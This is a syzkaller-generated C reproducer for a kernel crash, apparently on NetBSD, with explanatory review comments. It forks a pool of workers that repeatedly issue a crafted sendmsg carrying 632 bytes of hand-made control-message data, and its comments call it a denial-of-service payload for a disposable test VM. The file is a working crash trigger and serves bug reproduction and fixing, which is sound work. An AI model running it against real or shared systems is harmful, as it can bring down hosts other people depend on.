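// https://syzkaller.appspot.com/bug?id=910c84220f7ed55f124919cf54980c617e5fed76
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Kernel-crash reproducer. It forks a fixed number of worker processes, and
// each worker repeatedly forks a short-lived child that issues one crafted
// sendmsg() against a freshly created socket. Nothing is validated on
// purpose: the point is to reach a kernel code path, not to be a well-formed
// userspace program.
//
// Operational caveat: this is a denial-of-service payload against the target
// kernel. Run it only inside a disposable VM running the kernel under test,
// never on a shared host. The syscall-number fallbacks below look like BSD
// (NetBSD-style) numbers, so the reproducer was evidently generated for a
// non-Linux target; on other systems it will most likely just fail harmlessly.
//
// NOTE(review): the header names of the original `#include` lines were lost
// when this page was extracted (only bare `#include` tokens survived). The
// list below was reconstructed from the functions the code actually calls.

#define _GNU_SOURCE

#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

// Index of the worker process (0..5); set by main() before each fork.
unsigned long long procid;

// Forcibly terminate child `pid` and reap it. The wait uses -1 so that any
// child is reaped; in this program a worker has only one live child at a
// time, so the other statuses discarded here do not matter.
// Bails out if waitpid() reports an error (e.g. ECHILD) instead of spinning
// forever, which the original unconditional loop would have done.
static void kill_and_wait(int pid, int* status)
{
  kill(pid, SIGKILL);
  for (;;) {
    int reaped = waitpid(-1, status, 0);
    if (reaped == pid || reaped == -1)
      break;
  }
}

// Sleep for `ms` milliseconds.
static void sleep_ms(uint64_t ms)
{
  usleep(ms * 1000);
}

// Monotonic wall-clock in milliseconds; exits on clock failure because the
// reproducer has no meaningful way to continue without a timer.
static uint64_t current_time_ms(void)
{
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    exit(1);
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static void execute_one(void);

#define WAIT_FLAGS 0

// Worker main loop: fork a child to run the syscall sequence once, give it
// up to 5 seconds, then kill it and start over. Never returns.
static void loop(void)
{
  int iter;
  for (iter = 0;; iter++) {
    int pid = fork();
    if (pid < 0)
      exit(1);
    if (pid == 0) {
      execute_one();
      exit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
        break;
      sleep_ms(1);
      if (current_time_ms() - start < 5 * 1000)
        continue;
      // Child did not finish in time (possibly wedged in the kernel): kill it.
      kill_and_wait(pid, &status);
      break;
    }
  }
}

// Fallback syscall numbers for when the system headers do not provide them.
// These match a BSD syscall table (socket = 394 is NetBSD's), which is the
// target this reproducer was generated for; on a system whose <sys/syscall.h>
// already defines them, the system values win.
#ifndef SYS_dup
#define SYS_dup 41
#endif
#ifndef SYS_mmap
#define SYS_mmap 197
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 28
#endif
#ifndef SYS_socket
#define SYS_socket 394
#endif

// Syscall results carried between calls (syzkaller "resources"):
//   r[0] = socket fd, r[1] = dup of r[0]. -1 means "the call failed"; later
// calls are still issued with the bad value, by design.
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};

// One run of the fuzzer-derived syscall sequence. All pointer arguments
// live inside the fixed region mapped by main() at 0x20000000.
static void execute_one(void)
{
  intptr_t res = 0;

  // socket(domain=2, type=1, proto=0): presumably AF_INET / SOCK_STREAM on
  // the target (the numbers are not decoded symbolically here).
  res = syscall(SYS_socket, 2ul, 1ul, 0);
  if (res != -1)
    r[0] = res;

  // The sendmsg() below goes through a duplicate of the socket fd.
  res = syscall(SYS_dup, r[0]);
  if (res != -1)
    r[1] = res;

  // A struct msghdr written field by field at 0x20000180 (64-bit layout):
  //   +0x00 msg_name       = NULL
  //   +0x08 msg_namelen    = 0
  //   +0x10 msg_iov        = NULL
  //   +0x18 msg_iovlen     = 0
  //   +0x20 msg_control    = 0x200002c0
  //   +0x28 msg_controllen = 0x278 (632 bytes)
  //   +0x30 msg_flags      = 0
  // i.e. no payload at all -- the message consists solely of ancillary data.
  *(uint64_t*)0x20000180 = 0;
  *(uint32_t*)0x20000188 = 0;
  *(uint64_t*)0x20000190 = 0;
  *(uint64_t*)0x20000198 = 0;
  *(uint64_t*)0x200001a0 = 0x200002c0;

  // 632 bytes of hand-crafted control messages (cmsg headers plus mostly
  // random payload). Presumably this is what drives the kernel's ancillary
  // data parsing into the reported bug; the bytes are reproduced verbatim
  // and must not be "cleaned up".
  memcpy(
      (void*)0x200002c0,
      "\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xe8\xd3"
      "\x19\x88\x3e\x6e\x6d\x01\x7f\xe3\xfc\xb8\xbd\xfe\x3d\x79\x20\x0c\xec\x85"
      "\x90\xae\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x08"
      "\x00\x00\xf8\xfc\x5a\x6d\x8e\x53\xb2\x12\xf6\xd2\x59\x6a\x71\x47\x14\x16"
      "\x6b\xff\x90\x61\x50\x4d\x76\x33\xcd\xe6\xe2\x9c\x4b\x43\x91\xb6\x42\xfb"
      "\x3d\xcd\x18\x14\xfb\x59\x08\x31\x6e\x89\x8d\xb5\xea\x9e\x1f\x89\x13\x85"
      "\xc7\x22\x9b\xbb\x8c\x2b\xeb\xdc\x35\x79\xcb\x29\x85\x68\x65\xb1\x33\xad"
      "\xc5\xc9\xd5\x27\xaf\x82\xfe\xf5\x1e\x92\x48\xd2\x24\xda\x7d\xf8\x03\xc7"
      "\x20\xb7\x3a\xd6\x70\x2f\x5b\x67\x2a\xf3\xd8\xfb\x37\xa1\xdf\x05\x4b\x47"
      "\x06\x66\x16\x03\xd9\x48\x70\xfc\xac\x1d\x5a\xe5\xa8\x00\x20\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x23\x9f\x97\x90\x76\xb1"
      "\xd0\x9a\x1e\x9b\x89\x20\x2f\x60\x5b\x63\xd8\x00\x00\x00\x00\x00\x00\x00"
      "\xff\xff\x00\x00\x07\x00\x00\x00\x9a\x55\xcc\xc3\xbe\x5a\x62\x4f\x89\x0d"
      "\x79\xa7\x63\x50\x38\x52\xc2\xb4\x43\x11\xff\x5e\xd7\x15\xcf\x8e\xcc\x7b"
      "\xd7\xf4\xd4\x88\x9e\x74\xd6\x05\x59\x18\xe1\x94\x7a\xe5\x5e\x17\x97\xed"
      "\xf0\x52\xc7\x24\x37\x33\x58\x23\xbd\x9a\x62\x3a\xf1\xc2\x6a\xd3\x70\x82"
      "\xdb\x0b\xfb\xed\x7a\x26\xfd\x6d\xdb\x51\x1f\x31\x3a\x94\x89\x53\xc8\x95"
      "\x79\x28\x82\x47\xf2\xb0\x80\xbb\x17\xcc\x48\x0d\xa8\x58\x63\x06\x4c\x4d"
      "\x16\xfc\x19\xb9\x78\x57\x7d\xb9\xc5\xec\x86\x4f\xa0\xf2\x6f\x62\x96\x0f"
      "\x69\x29\xe5\x72\xac\xf8\x11\x2f\xa2\xa8\xa7\xc1\x4f\x28\x7a\x34\xfd\x52"
      "\x4c\x60\x8d\x27\x22\x12\x32\xd0\x10\x68\x0a\xc5\xe8\x86\x79\xca\x20\x7d"
      "\x4d\x15\xbb\x3e\x4d\x34\x5a\x5b\x39\x3b\x97\x6a\x6b\xa2\x62\x2a\xf5\xd9"
      "\x76\x51\xfc\xd3\x10\xca\xf3\x60\xe1\x40\x2d\x5a\x46\xab\xc7\x11\x46\x7c"
      "\x6b\xff\x1f\xd8\x45\xec\x15\x60\x77\xc4\xd0\x00\x00\x00\x00\x00\x00\x00"
      "\xff\xff\x00\x00\x00\x00\x00\x00\x4c\x4e\xf2\xb3\xcd\x05\xad\x8a\xe0\x7e"
      "\x2c\xba\x4b\x89\xa5\x84\xd4\x21\x76\xb9\xfd\x02\xf3\x21\x49\x33\xec\xc8"
      "\x10\x46\xb7\x82\x28\x70\xf1\xeb\x21\x66\x54\x89\x12\xe8\xb8\x0d\xb9\xfc"
      "\xa9\x2b\x0a\xd7\x04\x09\x8d\x4a\xa2\xb5\x9e\x0e\xea\x24\x4a\x2b\x26\xf7"
      "\xa9\xe8\xa4\x1e\x8f\xd4\x76\x95\x28\x1e\xfb\x7e\x65\x83\x33\x51\xaa\xc2"
      "\xfa\x4b\x0c\x11\xf0\x53\x1c\x67\x8a\xf5\x74\x83\x10\xa4\xef\xba\xef\x49"
      "\x2c\x5b\x17\x13\x02\x8e\x95\x8b\x7b\x85\x42\x86\x3c\xb1\x51\x55\x68\x63"
      "\x0e\x9a\x47\x26\x18\xec\xc7\xfa\x88\x80\x47\xea\x23\x0c\x67\x86\x60\x3b"
      "\xcd\x71\xf8\x28\xd5\xd6\x72\x19\x7c\xaa\xf4\x77\x48\xe1\x75\xd9\xb3\xc2"
      "\x5c\x2e\x2a\x60\xf8\x6e\x55\xd4\x30\xf2\x47\xa8\xf3\x55\xbc\x90\xaa\x5d"
      "\x82\x37\xdd\xe5\x8e\x25\xd9\x84\x02\xab\xba\xa3\x65\x4e\x00\x00\x00\x00"
      "\x00\x00",
      632);
  *(uint64_t*)0x200001a8 = 0x278;
  *(uint32_t*)0x200001b0 = 0;

  // sendmsg(dup_fd, &msghdr, flags=0xf). The flag bits are not decoded
  // symbolically here; they are whatever the fuzzer produced.
  syscall(SYS_sendmsg, r[1], 0x20000180ul, 0xful);
}

// Map the fixed scratch region, start the worker pool, then park forever.
int main(void)
{
  // 16 MiB at 0x20000000, prot=3 (read|write), flags=0x1012 -- presumably
  // MAP_PRIVATE|MAP_FIXED|MAP_ANON on the BSD target. The seventh argument is
  // the BSD mmap() pad word. Every pointer in execute_one() is inside this
  // region, so if the mapping fails there is nothing useful left to do;
  // reporting it beats having every child die with SIGSEGV in silence.
  intptr_t map = syscall(SYS_mmap, 0x20000000ul, 0x1000000ul, 3ul, 0x1012ul,
                         -1, 0ul, 0ul);
  if (map == -1) {
    perror("mmap");
    exit(1);
  }

  // Six independent workers, each running loop() until killed.
  for (procid = 0; procid < 6; procid++) {
    if (fork() == 0) {
      loop();
    }
  }

  // Parent keeps the process tree alive; it never exits on its own.
  sleep(1000000);
  return 0;
}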